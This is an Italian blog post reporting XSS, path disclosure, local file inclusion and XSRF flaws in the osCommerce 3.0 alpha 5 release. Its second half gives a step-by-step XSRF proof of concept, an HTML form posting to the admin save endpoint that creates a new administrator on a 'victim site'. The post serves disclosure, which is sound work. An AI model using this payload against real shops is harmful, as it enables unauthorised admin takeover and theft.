Seguendo la scia di notizie degli ultimi tempi che han portato alla luce gravi vulnerabilità per le ultime versioni di OsCommerce (2.3.1) e ZenCart (1.3.9h) non poteva mancare all’appello anche l’ultimissima alpha release osCommerce 3.0.a5.
Per gli sviluppatori di OsCommerce è davverò un brutto periodo dato che in neanche un mese tutti le versioni attualmente “stabili” sono state bucate da molteplici vulnerabilità. Nella release specifica, che ripetiamo si tratta di una alpha, sono state individuate vulnerabilità di tipo Xss, Full Path Disclosure, Local File Inclusion e XSRF.
La Full Path Disclosure consiste nell’interrogare alcuni file del Template di OsCommerce che, andando in errore, mostrano a video la full path della loro posizione sul Server. Con questa sola informazione si può fare poco ma, anche in questo caso, se unita ad altri tipi di attacchi diventa una utile informazione. La XSS permette di iniettare codice JavaScript sfruttando una falla del file “products.php” mentre la Local File Inclusion consente di richiamare file presenti sul Server sfruttando la procedura di disinstallazione moduli del Cms che non verifica opportunamente i parametri passati e permette di accettare in input qualsiasi path raggiungibile.
Anche in questo caso c’è una falla più grave delle altre e a mio avviso è la XSRF che permette di inviare comandi all’applicativo senza che questi vengano verificati in alcun modo. Nel caso specifico sarà possibile creare un nuovo Admin sull’OsCommerce.
Basterà creare una pagina “.html” contenente il seguente codice:
<form action="http:///admin/index.php?administrators&action=save" method="post"> <input type="text" name="user_name" value=""> <input type="text" name="user_password" value="">
Ovviamente dovrete sostituire i seguenti parametri:
<sito vittima> con il dominio del sito in cui si vuole creare l’account
<nomeutente> con il nome utente del nuovo Admin
<password> con la password da associare al nuovo Admin
Una volta creata la pagina richiamatela dal vostro Browser e cliccate su “Save”.
Se tutto è andato a buon fine accedendo all’url:
http://<sito vittima>/admin/
potrete loggarvi come Admin con i dati appena inseriti.
Per informazioni dettagliate vi rimando al link del Dr. Alberto Fontanella autore dell’articolo.
osCommerce v3.0a5 [ Multiple Vulnerabilities ]